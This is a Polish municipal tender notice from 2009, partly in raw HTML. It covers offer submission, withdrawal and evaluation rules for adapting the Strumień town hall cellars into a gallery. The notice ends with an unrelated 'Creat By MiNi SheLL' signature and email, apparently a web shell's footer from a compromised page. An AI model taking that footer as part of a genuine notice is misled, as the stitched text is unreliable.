Przetarg nieograniczony - oferta dotycząca wykonywania czynności inwestora zastępczego zadania pn: Budatín - Strumień: rewitalizacja i rozwój dziedzictwa kulturowego.
(Adaptacja piwnic Ratusza Miejskiego - Galeria Strumień wraz z zagospodarowaniem terenu).
Nie otwierać przed  18.09.2009 r. godz. 1030

-	poza oznaczeniami podanymi powyżej, koperta będzie posiadać nazwę i adres wykonawcy, aby można było odesłać ofertę w przypadku stwierdzenia jej opóźnienia.

9. Ofertę należy złożyć w siedzibie Zamawiającego Urząd Miejski w Strumieniu, ul. Rynek 4, 43-246 Strumień, pokój nr 5 do dnia 18.09.2009r. do godz. 1000

Wszystkie oferty otrzymane przez zamawiającego po terminie podanym wyżej zostaną odesłane wykonawcom nie otwarte. W przypadku przesyłania oferty pocztą, lub posłańcem, będzie się ją uważać za złożoną w terminie, jeżeli w wyznaczonym terminie zostanie doręczona do zamawiającego. Pełne ryzyko nie doręczenia oferty w terminie spoczywa na wykonawcy.

10. Wykonawca może wprowadzić zmiany lub wycofać złożoną przez siebie ofertę pod warunkiem, że zamawiający otrzyma pisemne powiadomienie o wprowadzeniu zmian lub wycofaniu przed terminem składania ofert określonym w pkt. 9. Powiadomienie 
o wprowadzeniu zmian lub wycofanie zostanie przygotowane, opieczętowane 
i oznaczone jak w pkt. 8, a koperty będą dodatkowo oznaczone napisem Zmiana lub Wycofanie. 
Wykonawca nie może wycofać oferty i wprowadzić zmian w ofercie po upływie terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zamowieniapubliczne.strumien.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Strumieniu, ul. Rynek 4, 43-246 Strumień.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2009 godzina 10:00, miejsce: Urząd Miejski w Strumieniu, ul. Rynek 4, 43-246 Strumień, pokój nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com